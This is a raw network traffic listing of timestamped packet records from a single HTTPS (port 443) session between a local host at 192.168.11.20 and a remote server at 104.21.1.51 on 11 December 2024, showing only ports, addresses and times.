Dec 11, 2024 12:30:18.526197910 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.526252031 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.526252031 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.526297092 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.527340889 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.527388096 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.527597904 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.527597904 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.527695894 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.527695894 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.527714014 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.527791977 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.527904034 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.528772116 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.528839111 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.528939009 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.528939009 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.528983116 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.528999090 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.529033899 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.529033899 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.529618979 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.529666901 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.529844999 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.529844999 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.529872894 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.529894114 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.529944897 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.530940056 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.530987024 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.531083107 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.531117916 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.531131029 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.531222105 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.531399012 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.531538963 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.531538963 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.531578064 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.531650066 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.531738997 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.719353914 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.719402075 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.719572067 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.719572067 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.719604969 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.719623089 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.719767094 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.720561981 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.720628023 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.720797062 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.720797062 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.720830917 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.720864058 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.720984936 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.721532106 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.721584082 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.721836090 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.721867085 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.721892118 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.722115040 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.722742081 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.722790956 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.722948074 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.722948074 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.722992897 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.722992897 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.723011971 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.723098040 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.723170042 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.724242926 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.724283934 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.724410057 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.724410057 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.724451065 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.724451065 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.724467039 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.724503040 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.724651098 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.725198984 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.725246906 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.725399017 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.725399017 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.725435972 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.725450993 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.725450993 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.725657940 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.726455927 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.726504087 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.726677895 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.726677895 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.726713896 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.726788998 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.726905107 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.727087021 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.727125883 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.727267027 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.727327108 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.727327108 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.727344036 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.727509975 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.728743076 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.728787899 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.728984118 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.729010105 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.729029894 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.729162931 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.729650021 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.729698896 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.730355024 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.730355024 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.730355024 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.730421066 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.730437994 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.730674982 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.730935097 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.730982065 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.731157064 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.731206894 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.731206894 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.731206894 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.731235027 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.731379986 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.732412100 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.732460976 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.732630014 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.732630968 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.732680082 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.732696056 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.732790947 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.732839108 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.733380079 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.733432055 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.733558893 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.733558893 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.733599901 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.733663082 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.733787060 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.734349012 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.734390974 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.734535933 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.734535933 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.734565973 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.734684944 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.734735966 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.735476971 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.735523939 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.735670090 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.735670090 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.735722065 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.735743046 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.735805035 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.735974073 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.736908913 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.736952066 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.737066031 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.737112045 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.737128973 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.737195969 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.737325907 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.737895966 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.737936020 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.738069057 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.738069057 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.738097906 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.738115072 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.738224983 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.738331079 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.739001989 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.739051104 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.739217043 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.739217043 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.739255905 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.739326000 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.739468098 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.740020037 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.740072966 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.740293980 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.740340948 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.740356922 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.740408897 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.740511894 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.741545916 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.741585016 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.741746902 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.741774082 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.741795063 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.741858006 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.741934061 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.742587090 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.742625952 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.742762089 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.742763042 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.742857933 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.742875099 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.742907047 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.743032932 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.743779898 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.743818998 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.743948936 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.743948936 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.744043112 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.744043112 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.744057894 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.744230986 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.744606018 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.744642973 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.744777918 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.744837046 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.744849920 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.744915962 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.744993925 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.746375084 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.746414900 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.746582985 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.746607065 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.746689081 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.746824980 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.747483015 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.747529984 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.747714043 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.747714043 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.747750998 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.747775078 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.747908115 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.748310089 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.748354912 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.748688936 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.748765945 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.748765945 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.748795033 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.748936892 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.749861002 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.749901056 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.750034094 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.750034094 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.750073910 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.750089884 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.750124931 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.750225067 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.750272036 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.751070023 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.751118898 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.751255989 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.751255989 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.751352072 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.751377106 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.751549006 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.752130032 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.752177000 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.752351046 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.752351046 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.752405882 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.752405882 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.752430916 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.752690077 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.753165960 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.753213882 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.753412962 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.753413916 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.753413916 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.753468990 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.753499985 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.753499985 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.753628016 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.754496098 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.754545927 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.754684925 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.754684925 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.754722118 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.754734039 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.754807949 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.754916906 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.755942106 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.755981922 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.756124973 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.756175995 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.756175995 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.756196976 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.756386042 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.756798029 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.756838083 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.756988049 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.756988049 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.757016897 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.757097960 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.757200003 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.757848024 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.757908106 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.758090973 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.758128881 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.758157969 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.758282900 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.759284019 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.759325027 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.759531975 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.759567976 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.759586096 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.759793043 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.760299921 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.760359049 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.761060953 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.761060953 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.761060953 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.761110067 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.761650085 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.761727095 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.761795998 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.761845112 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.761936903 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.761987925 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.763001919 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.763068914 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.763160944 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.763160944 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.763202906 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.763222933 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.763252974 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.763307095 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.763403893 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.764045954 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.764106989 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.764218092 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.764218092 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.764262915 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.764287949 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.764311075 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.764360905 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.764468908 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.765218973 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.765280962 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.765388012 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.765388012 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.765427113 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.765450001 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.765530109 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.765530109 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.765626907 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:18.766269922 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.766335011 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:18.766429901 CET	49761	443	192.168.11.20	104.21.1.51
